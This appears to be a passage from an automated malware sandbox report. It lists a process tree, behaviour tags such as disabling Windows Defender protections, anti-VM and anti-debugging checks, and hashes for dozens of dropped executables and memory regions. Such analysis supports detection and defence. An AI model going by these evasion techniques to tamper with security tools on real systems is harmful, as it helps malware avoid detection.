                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.2.1412349720\247694493" -childID 1 -isForBrowser -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a69bac0-4b15-49c6-aa05-a11402ae1fca} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2088 1015f358 tab
                                        6⤵
                                          PID:2792
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.3.667336605\570302175" -childID 2 -isForBrowser -prefsHandle 2636 -prefMapHandle 2632 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cebff203-e8dc-4de1-96ef-3c6e6d4f970b} 948 "\\.\pipe\gecko-crash-server-pipe.948" 2652 1cea4958 tab
                                          6⤵
                                            PID:2804
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.4.271526683\1969280333" -childID 3 -isForBrowser -prefsHandle 3864 -prefMapHandle 3860 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3abba5e3-6a00-4f35-ac60-e899e86a146e} 948 "\\.\pipe\gecko-crash-server-pipe.948" 3912 1fbb2a58 tab
                                            6⤵
                                              PID:3648
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.5.678688496\1769326617" -childID 4 -isForBrowser -prefsHandle 4020 -prefMapHandle 4024 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c9037f0-c1d0-4a33-80d8-a7360110c749} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4008 1fcc7358 tab
                                              6⤵
                                                PID:3656
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.6.1788730289\2049257363" -childID 5 -isForBrowser -prefsHandle 4184 -prefMapHandle 4188 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3201214d-8736-4275-b124-7da9daf25f25} 948 "\\.\pipe\gecko-crash-server-pipe.948" 4172 1fcc7f58 tab
                                                6⤵
                                                  PID:3676
                                          • C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe"
                                            3⤵
                                            • Modifies Windows Defender DisableAntiSpyware settings
                                            • Modifies Windows Defender Real-time Protection settings
                                            • Modifies Windows Defender TamperProtection settings
                                            • Modifies Windows Defender notification settings
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Windows security modification
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4084
                                      • C:\Windows\system32\taskeng.exe
                                        taskeng.exe {30FCB4AD-7091-4EEA-9D54-B36AFCC25BC4} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
                                        1⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2392
                                        • C:\ProgramData\kplnh\nvwjc.exe
                                          C:\ProgramData\kplnh\nvwjc.exe
                                          2⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1684
                                      • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                        "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                        1⤵
                                          PID:2804

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\ProgramData\18778BF760B0D867.dat

                                          Filesize

                                          92KB

                                          MD5

                                          6093b9b9effe107a1958b5e8775d196a

                                          SHA1

                                          f86ede48007734aebe75f41954ea1ef64924b05e

                                          SHA256

                                          a10b04d057393f5974c776ed253909cafcd014752a57da2971ae0dddfa889ab0

                                          SHA512

                                          2d9c20a201655ffcce71bfafa71b79fe08eb8aa02b5666588302608f6a14126a5a1f4213a963eb528514e2ea2b17871c4c5f9b5ef89c1940c40c0718ec367a77

                                        • C:\ProgramData\2nop8\lx4ozm

                                          Filesize

                                          96KB

                                          MD5

                                          d367ddfda80fdcf578726bc3b0bc3e3c

                                          SHA1

                                          23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

                                          SHA256

                                          0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

                                          SHA512

                                          40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

                                        • C:\ProgramData\2nop8\myuaas2db

                                          Filesize

                                          46KB

                                          MD5

                                          02d2c46697e3714e49f46b680b9a6b83

                                          SHA1

                                          84f98b56d49f01e9b6b76a4e21accf64fd319140

                                          SHA256

                                          522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                          SHA512

                                          60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                                        • C:\ProgramData\2nop8\ymymyu

                                          Filesize

                                          288KB

                                          MD5

                                          c6e1c1cbdbbafc9a480164efdde33bac

                                          SHA1

                                          c3de5624376ec2918635fac16d3a945d93825c63

                                          SHA256

                                          b3689e167043c3c63604862e688330cbb969cc05104f5ec153e5db0d980567cc

                                          SHA512

                                          fc79e9062663787cbdaa6901a4a94cf692292d91ceb580deb81d3f0601fc11044d21599b711fa47d3bf4a3030b12db2b34a98a04e44aa8a7cdb6ecf63d96df9b

                                        • C:\ProgramData\EF742872A369CDF0.dat

                                          Filesize

                                          148KB

                                          MD5

                                          90a1d4b55edf36fa8b4cc6974ed7d4c4

                                          SHA1

                                          aba1b8d0e05421e7df5982899f626211c3c4b5c1

                                          SHA256

                                          7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

                                          SHA512

                                          ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                          Filesize

                                          71KB

                                          MD5

                                          83142242e97b8953c386f988aa694e4a

                                          SHA1

                                          833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                          SHA256

                                          d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                          SHA512

                                          bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                          Filesize

                                          264KB

                                          MD5

                                          f50f89a0a91564d0b8a211f8921aa7de

                                          SHA1

                                          112403a17dd69d5b9018b8cede023cb3b54eab7d

                                          SHA256

                                          b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                          SHA512

                                          bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                          Filesize

                                          16B

                                          MD5

                                          18e723571b00fb1694a3bad6c78e4054

                                          SHA1

                                          afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                          SHA256

                                          8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                          SHA512

                                          43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\service[1].htm

                                          Filesize

                                          1B

                                          MD5

                                          cfcd208495d565ef66e7dff9f98764da

                                          SHA1

                                          b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                          SHA256

                                          5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                          SHA512

                                          31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

                                          Filesize

                                          23KB

                                          MD5

                                          af3dc27d55fc2649cb5325fca88f451d

                                          SHA1

                                          2f099ca412059d812b34fd2cb2d89329a154448a

                                          SHA256

                                          97e90c239700a709af25f61cb41ee30ec58ef5b8251d1df67133b2d4d3cf22fb

                                          SHA512

                                          8f861d3b547c0bcb90efa6ba52471f8181ba4aa88702cec20918c913b2a77568246caef1ad20bdc1583d0926be0d1913292d2cede549afc994dfbb6ffcfe6f23

                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                          Filesize

                                          15KB

                                          MD5

                                          96c542dec016d9ec1ecc4dddfcbaac66

                                          SHA1

                                          6199f7648bb744efa58acf7b96fee85d938389e4

                                          SHA256

                                          7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                          SHA512

                                          cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                        • C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

                                          Filesize

                                          38KB

                                          MD5

                                          47177b7fbf1ce282fb87da80fd264b3f

                                          SHA1

                                          d07d2f9624404fa882eb94ee108f222d76bbbd4c

                                          SHA256

                                          e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb

                                          SHA512

                                          059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

                                        • C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

                                          Filesize

                                          457KB

                                          MD5

                                          73636685f823d103c54b30bc457c7f0d

                                          SHA1

                                          597dba03dce00cf6d30b082c80c8f9108ae90ccf

                                          SHA256

                                          1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c

                                          SHA512

                                          183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

                                        • C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

                                          Filesize

                                          6.8MB

                                          MD5

                                          dab2bc3868e73dd0aab2a5b4853d9583

                                          SHA1

                                          3dadfc676570fc26fc2406d948f7a6d4834a6e2c

                                          SHA256

                                          388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

                                          SHA512

                                          3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

                                        • C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe

                                          Filesize

                                          1.8MB

                                          MD5

                                          f155a51c9042254e5e3d7734cd1c3ab0

                                          SHA1

                                          9d6da9f8155b47bdba186be81fb5e9f3fae00ccf

                                          SHA256

                                          560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af

                                          SHA512

                                          67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

                                        • C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

                                          Filesize

                                          11.5MB

                                          MD5

                                          9da08b49cdcc4a84b4a722d1006c2af8

                                          SHA1

                                          7b5af0630b89bd2a19ae32aea30343330ca3a9eb

                                          SHA256

                                          215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd

                                          SHA512

                                          579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

                                        • C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

                                          Filesize

                                          350KB

                                          MD5

                                          b60779fb424958088a559fdfd6f535c2

                                          SHA1

                                          bcea427b20d2f55c6372772668c1d6818c7328c9

                                          SHA256

                                          098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

                                          SHA512

                                          c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

                                        • C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

                                          Filesize

                                          48KB

                                          MD5

                                          d39df45e0030e02f7e5035386244a523

                                          SHA1

                                          9ae72545a0b6004cdab34f56031dc1c8aa146cc9

                                          SHA256

                                          df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2

                                          SHA512

                                          69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

                                        • C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

                                          Filesize

                                          415KB

                                          MD5

                                          641525fe17d5e9d483988eff400ad129

                                          SHA1

                                          8104fa08cfcc9066df3d16bfa1ebe119668c9097

                                          SHA256

                                          7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a

                                          SHA512

                                          ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

                                        • C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe

                                          Filesize

                                          2.0MB

                                          MD5

                                          6006ae409307acc35ca6d0926b0f8685

                                          SHA1

                                          abd6c5a44730270ae9f2fce698c0f5d2594eac2f

                                          SHA256

                                          a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

                                          SHA512

                                          b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

                                        • C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe

                                          Filesize

                                          120KB

                                          MD5

                                          5b3ed060facb9d57d8d0539084686870

                                          SHA1

                                          9cae8c44e44605d02902c29519ea4700b4906c76

                                          SHA256

                                          7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207

                                          SHA512

                                          6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

                                        • C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe

                                          Filesize

                                          361KB

                                          MD5

                                          2bb133c52b30e2b6b3608fdc5e7d7a22

                                          SHA1

                                          fcb19512b31d9ece1bbe637fe18f8caf257f0a00

                                          SHA256

                                          b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

                                          SHA512

                                          73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

                                        • C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe

                                          Filesize

                                          2.8MB

                                          MD5

                                          745e4bcf3d176ea5e82a7c26a6733757

                                          SHA1

                                          499cf0a28c9469faabae1e0f998c6a9b3e82862f

                                          SHA256

                                          8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63

                                          SHA512

                                          bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d

                                        • C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe

                                          Filesize

                                          3.8MB

                                          MD5

                                          6afaf17077308fa040a656dc9e7d15ed

                                          SHA1

                                          df7caf0b424dc62a60dfb64f585c111448c0c1e3

                                          SHA256

                                          42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0

                                          SHA512

                                          cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986

                                        • C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe

                                          Filesize

                                          445KB

                                          MD5

                                          c83ea72877981be2d651f27b0b56efec

                                          SHA1

                                          8d79c3cd3d04165b5cd5c43d6f628359940709a7

                                          SHA256

                                          13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482

                                          SHA512

                                          d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

                                        • C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe

                                          Filesize

                                          4.5MB

                                          MD5

                                          5d153f73ce1b6a907cf87ddb04ba12b2

                                          SHA1

                                          bfda9ee8501ae0ca60f8e1803efea482085bf699

                                          SHA256

                                          2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c

                                          SHA512

                                          0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

                                        • C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe

                                          Filesize

                                          1.8MB

                                          MD5

                                          8538c195a09066478922511ea1a02edf

                                          SHA1

                                          15e8910df845d897b4bb163caef4c6112570855b

                                          SHA256

                                          d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96

                                          SHA512

                                          60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

                                        • C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe

                                          Filesize

                                          3.1MB

                                          MD5

                                          7c169698effcdd45b7cbd763d28e87f5

                                          SHA1

                                          4f9db666d66255cd7ca2b0973ff00eae8b155f7a

                                          SHA256

                                          c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b

                                          SHA512

                                          58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

                                        • C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe

                                          Filesize

                                          1.7MB

                                          MD5

                                          2012699a5e85cd283323c324aa061bc7

                                          SHA1

                                          69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f

                                          SHA256

                                          937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5

                                          SHA512

                                          729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683

                                        • C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe

                                          Filesize

                                          949KB

                                          MD5

                                          e935a122d4c4e9c1b44368821a5154ff

                                          SHA1

                                          c93e4b9fb9563cb04a9cd39c75220eaf6007f98f

                                          SHA256

                                          161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4

                                          SHA512

                                          75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f

                                        • C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe

                                          Filesize

                                          1.7MB

                                          MD5

                                          e787e8998f5306a754d625d7e29bbeb5

                                          SHA1

                                          14e056dbf0b3991664910ee3a1d23a4bb2c0253d

                                          SHA256

                                          93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d

                                          SHA512

                                          30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6

                                        • C:\Users\Admin\AppData\Local\Temp\Tar8212.tmp

                                          Filesize

                                          183KB

                                          MD5

                                          109cab5505f5e065b63d01361467a83b

                                          SHA1

                                          4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

                                          SHA256

                                          ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

                                          SHA512

                                          753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

                                        • C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe

                                          Filesize

                                          22.0MB

                                          MD5

                                          0eb68c59eac29b84f81ad6522d396f59

                                          SHA1

                                          aacfdf3cb1bdd995f63584f31526b11874fc76a5

                                          SHA256

                                          dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f

                                          SHA512

                                          81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7

                                        • C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\python312.dll

                                          Filesize

                                          6.6MB

                                          MD5

                                          166cc2f997cba5fc011820e6b46e8ea7

                                          SHA1

                                          d6179213afea084f02566ea190202c752286ca1f

                                          SHA256

                                          c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546

                                          SHA512

                                          49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

                                        • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

                                          Filesize

                                          1.6MB

                                          MD5

                                          1dc908064451d5d79018241cea28bc2f

                                          SHA1

                                          f0d9a7d23603e9dd3974ab15400f5ad3938d657a

                                          SHA256

                                          d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454

                                          SHA512

                                          6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MGMBZB19LW7MGBQDHZWO.temp

                                          Filesize

                                          7KB

                                          MD5

                                          e86faecd0b92b6116aaa3cca906d6b9f

                                          SHA1

                                          7264c2cba3c3b3af9f4d7720c59a118134546ddd

                                          SHA256

                                          a8e62ca41334bf8e86ae2aa5e073e7566ebffcb8f6c6f591e9f469b0b478937b

                                          SHA512

                                          4aaa5d2c2cf09e8e151a8335aa0ea5dfbe59b9f6b1bb7ef6815fb55dff79009cd832a9077c2db2022e0022fd272b97163224c05ef7f0ed2bff7aacacdca1c7f2

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

                                          Filesize

                                          2KB

                                          MD5

                                          3a323a53ef7554fc415585baabacc2cf

                                          SHA1

                                          9d6af00ea3c5e84c17321e022b395b22c7994c9a

                                          SHA256

                                          160e98106f6fea6b8b4c60ce2f6fab5c912b61e6afbf78f603c9a841769a9f07

                                          SHA512

                                          778677921c66efa0987fbd47b84788b16dac424d3db3bf890fda91bd61dc8117401122e27f81e31a7a304f87ddeaf1bb2caf0d64689899f92ba5822d8e4926fa

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\8260db59-ce4a-4ec5-8fc7-a6923b96376e

                                          Filesize

                                          745B

                                          MD5

                                          be05a61ddcf57f2796b22e27d8ea9841

                                          SHA1

                                          065c5fca85f8a682e0c9220386013e964a1c936a

                                          SHA256

                                          0d939c02e8e6871c311a3bf416b499c738809b15d642d5bea75bcb53f387acc2

                                          SHA512

                                          1c4df25ae13b6f3be138b6c3f63f1ec22ae973d60c43b74c23549d0f7404b401446443306f2565073e826e73861f2ace265aace0837566771b69809e6352fc7f

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\d41625c8-9be6-404d-b6d9-28e68e206bec

                                          Filesize

                                          10KB

                                          MD5

                                          89054adf1cdefc3a754853aece29d215

                                          SHA1

                                          f3ebd5f373909ebf6bedcfbf3e7be5bcf698fc48

                                          SHA256

                                          d68ccf6a24ff7e4a4beaf0caf061d957aa435864a71e93c9a0bba8658d5b0e8e

                                          SHA512

                                          f559177de099bbbea03f3d91cad51bec9e1af27c859404536b7cde51006255b426063cc5b3d57ab5b468b3c72e1b90b57d45ee26ff8755b821bd793a73e742f1

                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

                                          Filesize

                                          6KB

                                          MD5

                                          317125259ae765765ee11cf30c473e32

                                          SHA1

                                          50c861defa414557c6ae70abce9e932259cfc509

                                          SHA256

                                          516c9e00bfe740ed3c1f0087e4f75d5bb4acc78fb3b196c91bd7d50976602632

                                          SHA512

                                          c4333f1da1c9968556d517ff4f94ec1911bf570f85161ffe543ee3768f1fb4b95fc0479380d9ec2d0cd51a8ea9414d0c55e5e500e12d64f743fd21530ffdeeba

                                        • C:\Windows\Tasks\Test Task17.job

                                          Filesize

                                          216B

                                          MD5

                                          4a8de9a1224a92688f27d5bfb505aa49

                                          SHA1

                                          b90d1ff6ea887bc2c1244cdee60a29e6fb22073a

                                          SHA256

                                          7f19e23ec6dbb218cc450401edb075350a918de5c4015ca94dcb2a0d51a97a00

                                          SHA512

                                          cb52e3ffe5f3ef4dcd3d511c8bd4a69e3c500484fe5a1d2578365af90b8f6564505dc00ca969f0d48c709fce48a997a94a1d8b7921127148359e2ddfca3f70d5

                                        • \Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                                          Filesize

                                          1.8MB

                                          MD5

                                          457a48e9c0a205ea619dd5d5b4c2a6c3

                                          SHA1

                                          15b8560577817747c13dc391d973ad2e26901315

                                          SHA256

                                          f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e

                                          SHA512

                                          ce53209091c4e22937bf82bd55e219347d4d3a5c339db8b5605ee4753edc2dbe292c40a3da7d736908c27f5c99636fd3c06ab4c81254366d89801cf3d9037e5a

                                        • memory/108-79-0x00000000046A0000-0x0000000004AE0000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/108-102-0x00000000046A0000-0x0000000004AE0000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/108-87-0x00000000046A0000-0x0000000004AE0000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/108-81-0x00000000046A0000-0x0000000004AE0000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/852-303-0x0000000000970000-0x00000000009D0000-memory.dmp

                                          Filesize

                                          384KB

                                        • memory/1396-344-0x000000013F8E0000-0x0000000140481000-memory.dmp

                                          Filesize

                                          11.6MB

                                        • memory/1396-446-0x000000013F8E0000-0x0000000140481000-memory.dmp

                                          Filesize

                                          11.6MB

                                        • memory/1440-573-0x00000000012E0000-0x0000000001358000-memory.dmp

                                          Filesize

                                          480KB

                                        • memory/1548-360-0x00000000000F0000-0x0000000000160000-memory.dmp

                                          Filesize

                                          448KB

                                        • memory/1604-109-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1604-523-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1604-285-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1604-474-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

                                        • memory/1604-107-0x0000000000400000-0x0000000000840000-memory.dmp

                                          Filesize

                                          4.2MB

